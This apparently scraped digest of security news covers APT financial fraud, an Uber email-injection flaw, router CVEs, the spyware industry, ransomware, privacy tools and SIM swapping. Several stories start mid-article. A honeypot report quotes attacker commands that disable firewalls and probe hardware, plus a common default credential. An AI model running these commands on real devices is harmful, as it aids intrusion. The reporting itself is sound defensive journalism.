The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia, with the intrusions aimed at banks and retail companies by injecting fraudulent transactions among benign activity to slip under the radar after an extensive study of the targets' financial structures.

"The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits," the researchers said in a report shared with The Hacker News, calling out the group's overlaps with another tracked by Mandiant as FIN13, an "industrious" threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016.

Elephant Beetle is said to leverage an arsenal of no fewer than 80 unique tools and scripts to execute its attacks, while simultaneously taking steps to blend in with the victim's environment over long periods to achieve its objectives.

"The unique modus operandi associated with the Elephant Beetle is their deep research and knowledge of victim's financial systems and operations and their persistent search for vulnerable methods to technically inject financial transactions, ultimately leading to major financial theft," Arie Zilberstein, vice president of incident response at Sygnia, told The Hacker News. "Given the long period of persistence this group has in victim's networks, they often change and adapt their techniques and tooling to continue to be relevant."

Zilberstein attributed the success of the campaign to the vast attack surface provided by legacy systems that are present in financial institutions' networks and can serve as entry points, thereby enabling attackers to gain a permanent foothold into target networks.

The adversary's modus operandi follows a low-profile pattern that begins with planting backdoors to study the victim's environment, specifically with an aim to understand the various processes used to facilitate financial transactions, followed by inserting rogue transactions of its own into the network that steal incremental amounts of money from the target to avoid setting off alarm.

But in the event the actor's fraudulent actions come to light, they temporarily cease their operations only to return a few months later. The initial access is brokered by taking advantage of unpatched flaws in external-facing Java-based web servers such as WebSphere and WebLogic, ultimately leading to the deployment of web shells that enable remote code execution and lateral movement —

CVE-2017-1000486 (CVSS score: 9.8) - Primefaces Application Expression Language Injection
CVE-2015-7450 (CVSS score: 9.8) - WebSphere Application Server SOAP Deserialization Exploit
CVE-2010-5326 (CVSS score: 10.0) - SAP NetWeaver Invoker Servlet Exploit
EDB-ID-24963 - SAP NetWeaver ConfigServlet Remote Code Execution

"This attack emphasizes once again that sophisticated attackers are sometimes lurking in networks for [a] long time," Zilberstein said. "While a lot of emphasis is given today to avoiding and preventing the imminent risk of ransomware, some other threat actors are still operating to stealthily proliferate themselves in networks to get a long term and steady financial gain."

"Organizations need to pay extra attention to these systems, particularly those which are externally facing, and perform patching and continuous hunting to prevent and detect attacks of similar nature," Zilberstein added.

Source

The researcher who discovered this flaw warns this vulnerability can be abused by threat actors to email 57 million Uber users and drivers whose information was leaked in the 2016 data breach.

Uber seems to be aware of the flaw but has not fixed it for now.

'Your Uber is arriving now'

Security researcher and bug bounty hunter Seif Elsallamy discovered a flaw in Uber's systems that enables anyone to send emails on behalf of Uber.

These emails, sent from Uber's servers, would appear legitimate to an email provider (because technically they are) and make it past any spam filters.

Imagine getting a message from Uber stating, 'Your Uber is arriving now,' or 'Your Thursday morning trip with Uber'—when you never made those trips.

In a demonstration, Elsallamy sent me the following email message that, without a doubt, appeared to have come from Uber and landed right in my inbox, not junk:

The email form sent to BleepingComputer by the researcher urges the Uber customer to provide their credit card information.

On clicking 'Confirm,' the form submits the text fields to a test site set up by the researcher.

Note, however, the message did have a clear disclaimer towards the bottom stating, "this is a security vulnerability Proof of Concept," and was sent to BleepingComputer with prior permission.

On New Year's Eve of 2021, the researcher responsibly reported the vulnerability to Uber via their HackerOne bug bounty program.

However, his report was rejected for being "out-of-scope" on the erroneous assumption that exploitation of the technical flaw itself required some form of social engineering:

It seems this isn't the first time that Uber has dismissed this particular flaw either.

Bug bounty hunters Soufiane el Habti and Shiva Maharaj claim they had previously reported the issue to Uber without success [1, 2, 3].

57 million Uber customers and drivers at risk

Contrary to what one may believe, this isn't a simple case of email spoofing used by threat actors to craft phishing emails.

In fact, the email sent by the researcher "from Uber" to BleepingComputer passed both DKIM and DMARC security checks, according to email headers seen by us.

The researcher's email was sent via SendGrid, an email marketing and customer communications platform used by leading companies.

But, Elsallamy tells BleepingComputer that it is an exposed endpoint on Uber's servers responsible for the flaw and allows anyone to craft an email on behalf of Uber.

The vulnerability is "an HTML injection in one of Uber's email endpoints," says Elsallamy, drawing comparison to a similar flaw discovered in 2019 on Meta's (Facebook's) servers by pen-tester Youssef Sammouda.

In Meta's case, the endpoint looked identical to:

https://legal.tapprd.thefacebook.com/tapprd/Portal/ShowWorkFlow/AnonymousEmbed/XXXXXXXXXXXXX 

Understandably, for security reasons, the researcher did not disclose the vulnerable Uber endpoint.

He questioned Uber, "Bring your [calculator] and tell me what would be the result if this vulnerability has been used with the 57 million email [addresses that leaked] from the last data breach?"

"If you know the result then tell your employees in the bug bounty triage team."

Elsallamy is referring to Uber's 2016 data breach that exposed the personal information of 57 million Uber customers and drivers.

For this mishap, UK's Information Commissioner's Office (ICO) had fined Uber £385,000, along with the data protection authority in the Netherlands (Autoriteit Persoonsgegevens) fining the company €600.000.

By exploiting this unpatched vulnerability, adversaries can potentially send targeted phishing scams to millions of Uber users previously affected by the breach.

When asked what could Uber do to remediate the flaw, the researcher advises:

"They need to sanitize the users' input in the vulnerable undisclosed form. Since the HTML is being rendered, they might use a security encoding library to do HTML entity encoding so any HTML appears as text," Elsallamy told BleepingComputer.

BleepingComputer reached out to Uber well in advance of publishing but has not heard back at this time.

Uber users, staff, drivers, and associates should watch out for any phishing emails sent from Uber that appear to be legitimate as exploitation of this flaw by threat actors remains a possibility.

Update 11:55 AM: Added reference to the same flaw having been reported in 2015/16 and March 2021 but dismissed.

Uber ignores vulnerability that lets you send any email from Uber.com

Nighthawk R6700 is a popular dual-bank WiFi router advertised with gaming-focused features, smart parental controls, and internal hardware that is sufficiently powerful to accommodate the needs of home power users.

The six flaws were discovered by researchers at cybersecurity company Tenable and could allow an attacker on the network to take complete control of the device:

• CVE-2021-20173: A post-authentication command injection flaw in the update functionality of the device, making it susceptible to command injection.
• CVE-2021-20174: HTTP is used by default on all communications of the device’s web interface, risking username and password interception in cleartext form.
• CVE-2021-20175: SOAP Interface (port 5000) uses HTTP to communicate by default, risking username and password interception in cleartext form.
• CVE-2021-23147: Command execution as root without authentication via a UART port connection. Exploiting this flaw requires physical access to the device.
• CVE-2021-45732: Configuration manipulation via hardcoded encryption routines, allowing the changing of settings that are locked for reasons of security.
• CVE-2021-45077: All usernames and passwords for the device’s services are stored in plaintext form in the configuration file.

On top of the aforementioned security issues, Tenable found several instances of jQuery libraries relying on version 1.4.2, which is known to contain vulnerabilities. The researechers also note that the device uses a MiniDLNA is server version with publicly known flaws.

The recently disclosed flaws affect firmware version 1.0.4.120, which is the latest release for the device.

Users are advised to change the default credentials to something unique and strong and follow recommended security practices for more robust defense against malware infections.

Also, check Netgear’s firmware download portal regularly and install new versions as soon as they become available. Turning on automatic updates on your router is also recommended.

The current security report refers to Netgear R6700 v3, which is still under support, not Netgear R6700 v1 and R6700 v2, which have reached end of life. If you are still using the older models, it is recommended to replace them.

Tenable disclosed the above issues to the vendor on September 30, 2021, and even though some information exchange in the form of clarifications and suggestions took place afterward, the problems remain unaddressed.

We have reached out to Netgear asking for a comment on the above, and we will add an update to this story as soon as we hear back from them.

Netgear leaves vulnerabilities unpatched in Nighthawk router

A shock has reverberated inside Israel in the last few months. NSO Group, the billion-dollar Israeli company that has sold hacking tools to governments around the world for more than a decade, has drawn intense scrutiny after a series of public scandals. The company is in crisis. Its future is in doubt.

But while NSO Group’s future is uncertain, governments are more likely than ever to buy cyber capabilities from the industry NSO helped define. Business is booming for “hackers for hire” firms. In the last decade, the industry has grown from a novelty into a key instrument of power for nations around the world. Even the potential failure of a major firm like NSO Group isn’t likely to slow the growth.

Just this month, Facebook reported that seven hacker-for-hire firms from around the world had targeted around 50,000 people on the company’s platforms. The report spotlighted four more Israeli companies alongside operations from China, India, and North Macedonia. The fact that the investigation didn’t even mention NSO Group shows that the industry and its targeting are far more vast than what the public can typically see.

NSO Group has been besieged by criticism and charges of abuse for years. In 2016, the United Arab Emirates was caught targeting human rights activist Ahmed Mansoor using NSO Group’s Pegasus, a tool that leverages software flaws to hack iPhones and turn control over to NSO Group’s customers. In that case, the UAE government was seen as the culprit, and NSO walked away unscathed (Mansoor is still in prison on charges of criticizing the country’s regime).

The pattern repeated for years–over and over again, governments would be accused of using NSO hacking tools against dissidents but the company denied wrongdoing and escaped punishment. Then, in mid-2021, new reports emerged of alleged abuse against Western governments. The company was sanctioned by the US in November, and in December Reuters reported that US State Department officials had been hacked using Pegasus.

Now NSO Group faces expensive public lawsuits from Facebook and Apple. It has to deal with debt, low morale, and fundamental threats to its future. Suddenly, the poster child for spyware is confronting an existential crisis.

All of this is familiar territory. The secretive hacker-for-hire industry first splashed across international newspaper headlines in 2014, when the Italian firm Hacking Team was charged with selling its “untraceable” spyware to dozens of countries without regard for human rights or privacy violations.

Hacking Team opened the world’s eyes to a global industry that bought and sold powerful tools to break into computers anywhere. The resulting storm of scandals seemed to eventually kill it. The company lost business and the ability to legally sell its tools internationally.

Hacking Team was sold and, in the public’s mind, left for dead. Eventually, however, it rebranded and started selling the same products. Only this time, it was a smaller fish in a much bigger pond.

“The demise of Hacking Team did not lead to fundamental change in the industry at all,” says James Shires, assistant professor at the Institute of Security and Global Affairs at Leiden University. “The same dynamic and demand still exists.”

The industry’s earliest customers were a small set of countries eager to project power around the world through the internet. The situation is far more complex today. Many more countries now pay for the instant capability to hack adversaries both internationally and within their own borders. Billions of dollars are at play, but there’s very little transparency and even less accountability.

While public scrutiny of firms that provide hackers for hire has grown, the global demand for offensive cyber capabilities has escalated too. In the 21st century, a government’s highest-value targets are online more than ever—and hacking is usually the most effective way to get to them.

The result is a growing crowd of countries willing to spend large sums to develop sophisticated hacking operations.

For governments, investing in cyber is a relatively cheap and potent way to compete with rival nations—and develop powerful tools of domestic control.

“Especially in the last five years, you have more countries developing cyber capabilities,” says Saher Naumaan, a principal threat intelligence analyst at BAE Systems.

And more of those countries are looking outside for help. “If you don’t have a way to harness the skills or talent of the people in your country but you have the resources to outsource, why wouldn’t you go commercial?” she says. “That’s an option in a lot of different industries. In that way, cyber is not that different. You’re paying for something you’re not going to build yourself.”

For example, oil-rich countries on the Persian Gulf have historically lacked the considerable technical capability needed to develop domestic hacking power. So they spend on a shortcut. “They don’t want to be left behind,” Naumaan says.

Military contracting giants across the world now develop and sell these capabilities. These tools have been used to commit egregious abuses of power. They’re also increasingly used in legitimate criminal investigations and counterterrorism and are key to espionage and military operations.

The demand for what private hacking companies are selling isn’t going away. “The industry is both bigger and more visible today than it was a decade ago,” says Winnona DeSombre, a security researcher and fellow at the Atlantic Council. “The demand is rising because the world is becoming more technologically connected.”

DeSombre recently mapped the famously opaque industry by charting hundreds of companies selling digital surveillance tools around the world. She argues that much of the industry’s growth is hidden from public view, including Western companies’ sales of cyber weapons and surveillance technology to geopolitical adversaries.

“The biggest issue comes when this space is primarily self-regulated,” she explained. Self-regulation “can result in widespread human rights abuses” or even friendly fire, when hacking tools are sold to foreign governments that turn around and use the same capabilities against the country of origin.

Alerted to the industry’s increasing impact, authorities around the world now aim to shape its future with sanctions, indictments, and new regulations on exports. Even so, the demand for the tools grows.

Ultimately, the most meaningful change may come when there’s an impact on companies’ revenue. Recent reports show that NSO Group is saddled with debt and struggling to court Wall Street investment.

“This is a commercial industry, after all,” Shires says. “If venture capital firms and big corporate investors see this as a risky bet, they’ll choose to pull out. More than anything else, that can change the industry radically.”

Source

Last month, a US police department was breached by AvosLocker, who encrypted devices and stole data during the attack.

However, according to a screenshot shared by security researcher pancak3, after learning that the victim was a government agency, they provided a decryptor for free.

While they provided a decryptor to the police department, the ransomware operation refused to provide a list of stolen files or how they breached the department's network. 

A member of the AvosLocker operation told BleepingComputer today that they have no policy on who they target but usually avoid encrypting government entities and hospitals.

"You should note, however, that sometimes an affiliate will lock a network without having us review it first," the AvosLocker operator told BleepingComputer.

When asked if they purposely avoid targeting government agencies out of fear of law enforcement, they said it's more because "tax payer money's generally hard to get."

However, international law enforcement operations have resulted in numerous indictments or arrests of ransomware members and money launderers over the past year. These arrests include members of the REvil, Egregor, Netwalker, and Clop ransomware gangs.

This increased pressure is shown to have a good effect, leading to numerous ransomware operations shutting down, including the DarkSide, BlackMatter, Avaddon, and REvil operations.

Unfortunately, many of these ransomware gangs just rebrand as a new operation, thinking it will help them evade law enforcement.

Even with these arrests and increased pressure, AvosLocker said they are not worried about law enforcement as they "have no jurisdiction" in the "motherland."

Ransomware gang coughs up decryptor after realizing they hit the police

LastPass says no passwords were compromised following breach scare

Unlike other search engines, DuckDuckGo says they do not track your searches or your behavior on other sites. Instead of building user profiles used to display interest-based ads, DuckDuckGo search pages display contextual advertisements based on the searched keywords.

This means that if you search on DuckDuckGo for a television, that search query will not be used to display television ads at every other site you visit.

Furthermore, to build their search index, the search engine uses the DuckDuckBot spider to crawl sites and receive data from partners, such as Wikipedia and Bing. However, they do not build their index using data from Google.

DuckDuckGo shows rapid growth

While Google remains the dominant search platform, DuckDuckGo has seen impressive year-over-year growth.

In 2020, DuckDuckGo received 23.6 billion total search queries and achieved a daily average of 79 million search queries by the end of December.

In 2021, DuckDuckGo received 34.6 billion total search queries so far and currently has an average of 100 million search queries per day, showing a 46.4% growth for the year.

While DuckDuckGo's growth is considerable, it still only has 2.53% of the total market share, with Yahoo at 3.3%, Bing at 6.43%, and Google holding a dominant share of 87.33% of search engine traffic in the USA.

However, as people continue to become frustrated with how their data is being used by tech giants like Google, Facebook, Microsoft, and Apple, we will likely see more people switch to privacy-focused search engines.

To further help users protect their privacy, DuckDuckGo released an email forwarding service in 2021 called 'Email Protection' that strips email trackers and allows you to protect your actual email address.

They also introduced 'App Tracking Protection for Android,' which blocks third-party trackers from Google and Facebook found in apps.

More recently, DuckDuckGo announced they are releasing a DuckDuckGo Privacy Browser for Desktop that will not be based on Chromium and will be built from scratch.

"No complicated settings, no misleading warnings, no "levels" of privacy protection – just robust privacy protection that works by default, across search, browsing, email, and more," explains a recent blog post about the new browser.

"It's not a "privacy browser"; it's an everyday browsing app that respects your privacy because there's never a bad time to stop companies from spying on your search and browsing history."

For those looking to take back control of their data and add more privacy to their search behavior, DuckDuckGo may be the search engine for you.

Privacy-focused search engine DuckDuckGo grew by 46% in 2021

A member of uBlock Origin's team, who was investigating the issue, proposed a change, to make tabs reload after the ad blocking plugin is ready to filter the web requests. That could be a potential solution for stopping the ads before they could be delivered. But, Raymond Gorhill, the creator of the add-on, said that making tabs reload unconditionally would be a bad idea, especially if the user has hundreds of tabs. Imagine if all the tabs reloaded simultaneously, that could result in chaos.

uBlock Origin 1.40 Update prevents YouTube ads from loading when Chrome starts

Gorhill suggested that the extension should only reload when a network request has been made by the tab. The developers worked with this in mind, and introduced a commit at the add-on's repo. They have enabled a feature that was previously being tested, it's referred to as suspendTabsUntilReady. The new version of the add-on, uBlock Origin 1.40 brings the fix for the YouTube ads at Chrome startup.

With the change, uBlock Origin will reload active tabs when Chrome is launched, while ignoring the tabs that were inactive/suspended. The update for the extension also includes a couple of other improvements for the My Filters Editor's auto-complete functionality, scriplets, defusers, and the issue reporter. Pop-up filtering now supports a new scriptlet, window-close-if. The update is not yet live on the Chrome webstore, Opera  Addons store and Microsoft Store, but is already available on Firefox's AMO.

This YouTube ad issue isn't new per se. A few months ago, Opera browser's default ad blocker had the same problem. After reading user reports, I observed the same pattern when I tested the browser. It was generally agreed by the tech community that YouTube was changing the way ads were delivered, as a counter-active measure to prevent ad blockers from throttling ads. The issue was patched in a later version of Opera.

Google will stop supporting Manifest V2 extensions in 2023, to force developers to shift to Manifest V3 sans the webRequest blocking API. But the search giant is already messing with ad blocking. When support for V2 ends, it will effectively break the functionality of adblockers, including uBlock Origin for Chrome. Many users are worried about it, and are hoping the extension  will somehow work in the browser after the dreaded change is forced upon developers. Can you blame them for being concerned? Here's an interesting article by the EFF, that talks more about the technical details of Manifest V3.

Fortunately, there are alternatives that you may want to consider switching to. Vivaldi and Brave have confirmed they will not implement V3 in their browser, and Mozilla will implement its own version of Manifest V2 with the ability to perform cross-origin requests, it will continue supporting V2 for a year after it has been deprecated. As for Microsoft Edge, I recommend reading about recent issues circling the browser, before deciding if you should switch to it.

uBlock Origin 1.40 Update introduces a workaround to block YouTube ads that were loaded at Chrome startup

More specifically, the honeypot was meant to create a sufficiently diverse ecosystem and cluster the generated data in a way that determines the goals of adversaries.

IoT (Internet of Things) devices are a booming market that includes small internet-connected devices such as cameras, lights, doorbells, smart TVs, motion sensors, speakers, thermostats, and many more.

It is estimated that by 2025, over 40 billion of these devices will be connected to the Internet, providing network entry points or computational resources that can be used in unauthorized crypto mining or as part of DDoS swarms.

Setting the stage

The three components of the honeypot ecosystem set up by researchers at the NIST and the University of Florida included server farms, a vetting system, and the data capturing and analysis infrastructure.

To create a diverse ecosystem, the researchers installed Cowrie, Dionaea, KFSensor, and HoneyCamera, which are off-the-shelf IoT honeypot emulators.

The researchers configured their instances to appear as real devices on Censys and Shodan, two specialized search engines that find internet-connected services.

The three main types of honeypots were the following:

• HoneyShell – Emulating Busybox
• HoneyWindowsBox – Emulating IoT devices running Windows
• HoneyCamera – Emulating various IP cameras from Hikvision, D-Link, and other devices.

A novel element in this experiment is that the honeypots were adjusted to respond to attacker traffic and attack methods. 

The researchers used the collected data to change the IoT configuration and defenses and then gather new data that reflected the actor's response to these changes.

The findings

The experiment produced data from massive 22.6 million hits, with the vast majority targeting the HoneyShell honeypot.

The various actors exhibited similar attack patterns, likely because their objectives and the means to achieve them were common.

For example, most actors run commands such as "masscan" to scan for open ports and "/etc/init.d/iptables stop" to disable firewalls.

Additionally, many actors run "free -m", "lspci grep VGA", and "cat /proc/cpuinfo", all three aiming to collect hardware information about the target device.

Interestingly, almost a million hits tested "admin / 1234" username-password combination, reflecting an overuse of the credentials in IoT devices.

As for end goals, the researchers found that the HoneyShell and the HoneyCamera honeypots were targeted mainly for DDoS recruitment and were often also infected with a Mirai variant or a coin miner.

Coin miner infections were the most common observation on the Windows honeypot, followed by viruses, droppers, and trojans.

In the case of the HoneyCamera, the researchers intentionally crafted a vulnerability to reveal credentials and noticed that 29 actors engaged in exploiting the flaw manually.

"Only 314 112 (13 %) unique sessions were detected with at least one successful command execution inside the honeypots," explains the research paper.

"This result indicates that only a small portion of the attacks executed their next step, and the rest (87 %) solely tried to find the correct username/password combination."

Honeypot experiment reveals what hackers want from IoT devices

If you are using Microsoft Edge, either as the main browser on the system, as a secondary browser, or only when it is open as the default browser for certain links on the system, then you may want to check the settings of the browser to find out if search data is being sent to Microsoft.

When I opened Microsoft Edge today, Assistance from Microsoft Edge displays a popup shortly after start. It told me that I could help Microsoft make search better and that Microsoft "will collect results from searches that you perform in the browser to improve Microsoft products and services". The data that is collected by Microsoft is "never associated" with the user or the device, Microsoft added reassuringly.

A quick check of the setting revealed that Microsoft Edge turned it on, as it was turned off previously. The setting in question is called "Help improve Microsoft products by sending the results from searches on the web", and you find it in the privacy section.

How to check if Microsoft Edge is sending search data to Microsoft

1. Load edge://settings/privacy#searchServiceImprovement in the Microsoft Edge web browser; this should load the relevant setting right away. Microsoft's prompt has a "manage setting" button, but it does not reveal the name of the setting and you are taken to the top of the privacy and security settings page of Edge.
2. Toggle "Help improve Microsoft products by sending the results from searches on the web" to off to disable it (under Search and service improvement).

A support page on the Microsoft website explains what Microsoft is collecting and how it uses the data.

Microsoft may collect:

• the search term
• the search results that are displayed.
• the interaction with the search results, including links that are clicked on.
• demographic data.

Other data may be collected, but the four items above are listed explicitly by Microsoft.  All the data is collected to improve the user experience in Edge, Bing, Microsoft News and other company services according to Microsoft.

Microsoft claims that it scrubs and de-identifies data by "removing data identifying the person or device from which it was collected", that it does not use the data to "personalize or provide ads", that it never associates the data with an account or device, and that the feature is not available on managed devices.

Closing Words

Microsoft, like many other browser makers, is making setting changes to its browser, which many users would object to, if asked correctly. The change is made automatically, and users need to become active to disable it, provided that they fully understand the implications of having the feature enabled.

The popup text is worded cleverly, who would not want better search results?

Microsoft Edge may be sending search results to Microsoft! Here is how you turn that off

"This Windows 10 feature update brings very few new policy settings," Microsoft security consultant Rick Munck said.

"One setting has been added for this release for printer driver installation restrictions (which was also added to the Windows 11 release). Additionally, all Microsoft Edge Legacy settings have been removed,"

Protection from human-operated ransomware

However, the highlight of the new Windows 10 security baseline is the addition of tamper protection as a setting to enable by default (this was also made a default setting in the Windows 11 security baseline two months ago).

When toggling on the Microsoft Security Baseline for Windows 10 21H2, Redmond urges admins to toggle on Defender for Endpoint's tamper protection feature to protect against human-operated ransomware attacks.

This feature does that by blocking attempts by ransomware operators or malware to disable OS security features and security solutions to gain easier access to sensitive data and deploy further malware or malicious tools.

Tamper protection automatically locks Microsoft Defender Antivirus using the default secure values, thwarting attempts to change them using the registry, PowerShell cmdlets, or group policies.

After enabling it, ransomware operators would have a considerably more challenging task when trying to:

• Disable virus and threat protection
• Disable real-time protection
• Turnoff behavior monitoring
• Disable antivirus (such as IOfficeAntivirus (IOAV))
• Disable cloud-delivered protection
• Remove security intelligence updates
• Disable automatic actions on detected threats

PrintNightmare and Edge Legacy

With the new Windows 10 21H2 security baseline, Redmond removed all Microsoft Edge Legacy settings after its EdgeHTML-based web browser reached end of support in March.

"Going forward, please use the new Microsoft Edge (Chromium-based) baseline, which is on a separate release cadence and available as part of the Microsoft Security Compliance Toolkit," Munck added.

Microsoft also added a new setting to the MS Security Guide custom administrative template designed to restrict printer driver installation to users with Administrator privileges.

The new recommendation follows security updates released starting with July 2021 to address the CVE-2021-34527 PrintNightmare remote code execution flaw impacting the Windows Print Spooler service.

Now available for download

Windows security baselines provide Microsoft-recommended security configurations which reduce Windows systems' attack surface and increase the overall security posture of enterprise endpoints.

"A security baseline is a group of Microsoft-recommended configuration settings that explains their security impact," as Microsoft explains. "These settings are based on feedback from Microsoft security engineering teams, product groups, partners, and customers."

The Windows 10 21H2 security baseline is now available for download via the Microsoft Security Compliance Toolkit, and it includes Group Policy Object (GPO) backups and reports, the scripts needed to apply settings to the local GPO, as well as Policy Analyzer rules.

"Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate," Munck added.

More info on the changes that the new Windows 10 21H2 security baseline comes with is available in this Microsoft Security Baselines blog post.

Windows 10 21H2 adds ransomware protection to security baseline

"On April 15, 2022, support for prior generations of My Cloud OS, including My Cloud OS 3, will end," the company said this week.

"If your device isn't compatible with My Cloud OS 5, you will lose remote access and will only be able to access it locally. Devices on these older firmware versions will not receive security fixes or technical support."

Western Digital advises customers to protect their data from attackers after the firmware is no longer supported by backing up their devices, disabling remote access, disconnecting it from the internet, and choosing a unique and strong password.

Those who have eligible devices can update them to My Cloud OS 5 (which will be supported at least until the end of 2026) before the end of support date.

If the device isn't compatible with the My Cloud OS 5 firmware, they can consider upgrading to a device that is.

"My Cloud OS 5 is a major and fundamental security release that provides an architectural revamp of our older My Cloud firmware and adds new defenses to thwart common classes of attacks," Western Digital says.

"We will not provide any further security updates to the My Cloud OS3 firmware. We strongly encourage moving to the My Cloud OS5 firmware."

20% discount coupons for upgrades

For details on finding if you have a device compatible with My Cloud OS 5, you can check the Firmware Availability and Supported Devices support page.

To make it easier to upgrade to a supported My Cloud device, in January 2022, the company will send 20% discount coupons to customers with devices that aren't compatible with My Cloud OS 5 via email.

You will not be required to return your old device to use the coupon, which will be usable for 90 days to buy one of the qualifying products: My Cloud Home (8TB), My Cloud EX2 Ultra (16TB, 24TB, 28TB) or My Book (12 TB). 

To underscore the risks of running unsupported firmware, in July, Western Digital warned of ongoing attacks targeting My Book Live and My Book Live Duo devices.

In some cases, these attacks led to all data from hacked devices being erased after the attackers triggered an unauthenticated factory reset vulnerability (CVE-2021-35941).

The threat actors deployed trojan malware on other compromised devices using exploits targeting a second bug, a critical root remote command execution flaw tracked as CVE-2018-18472.

The vulnerabilities exploited in these attacks were limited to the My Book Live device series that received the final firmware update in 2015.

Western Digital warns customers to update their My Cloud devices

Google Chrome and Mozilla Firefox use Google Safe Browsing API to protect users against malware and phishing attacks. Microsoft Edge uses Microsoft Defender SmartScreen for protection.

The following browser versions were used for the test on a Windows 10 Pro version 21H1 system:

• Google Chrome: Version 90.0.4430.212 - 91.0.4472.19
• Microsoft Edge: Version: 91.0.864.19 - 91.0.864.37
• Mozilla Firefox: Version 88.0.1 - 88.0.1

Microsoft Edge offered better protection during the test period than the two other browsers. For malware attacks, Edge managed to block 97.4% of all attacks  and 97.7% zero-hour attack protection. Chrome blocked 86.3% of all attacks and Firefox 81.8% of all attacks according to the study.

Microsoft Edge offered the most protection, blocking 97.4% of malware while providing the highest zero-hour protection rate (97.7%). Google Chrome provided the second-highest protection, blocking an average of 86.3%, followed by Mozilla Firefox at 81.8%.

Company researchers analyzed the blocking behavior over time. Microsoft Edge's capabilities did not change much over time, but it protected against 97.7% of all attacks from the first hour attacks began. After seven days, Edge managed to block 97.9% of all attacks.

Google Chrome and Firefox blocked 86.4% and 82.8% of all threats respectively in the first hour. On the first day, protection percentages rose to 90.6% for Chrome and 85.9% for Firefox. After seven days, Chrome blocked 93.1% of all attacks and Firefox 88.7% of all attacks according to the study.

Microsoft Edge offered better protection against phshing attacks as well according to the study. Microsoft's browser blocked 92.3% of all phishing URLs, Chrome 84.6% and Firefox 83.2%.

Microsoft Edge offered the most protection, blocking 92.3% of phishing URLs while providing the highest zero-hour protection rate (93.5%). Google Chrome provided the second-highest protection, blocking an average of 84.6%, followed by Mozilla Firefox at 83.2%.

The block rate over time changed only slightly for all tested browsers. Edge's blocking rose to 95.1%, Chrome's to 92.9% and Firefox's to 90.6%.

Interested users find test methodology and the two comparative rating reports as PDF downloads on the Cyber Ratings website. Everything is available as a free direct download at the time of writing.

Closing Words

Microsoft Edge has the edge when it comes to malware and phishing protections according to the study. The base configuration of each browser was used and automatic updates were enabled. Protections can be improved significantly by users, for instance by installing content blockers or by using common sense while on the Internet.

(via Dr. Windows)

Cyber Ratings report: Microsoft Edge offers better malware and phishing protection

A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.

Truglia admitted to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.

Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury criminally indicted Truglia (PDF) for his part in the crypto theft from Terpin.

A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.

But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.

Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.

Reached for comment, Terpin said his assailant got off easy.

“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.

Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.

“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”

Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.

“On the surface, Pinsky is an ‘All American Boy,'” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”

“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”

Pinksy could not be immediately reached for comment. But a review of the latest filings in the lawsuit show that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.

Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the REACT task force, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities arrested Truglia on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website stopsimcrime.org.

According to published reports, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.

Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.

Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.

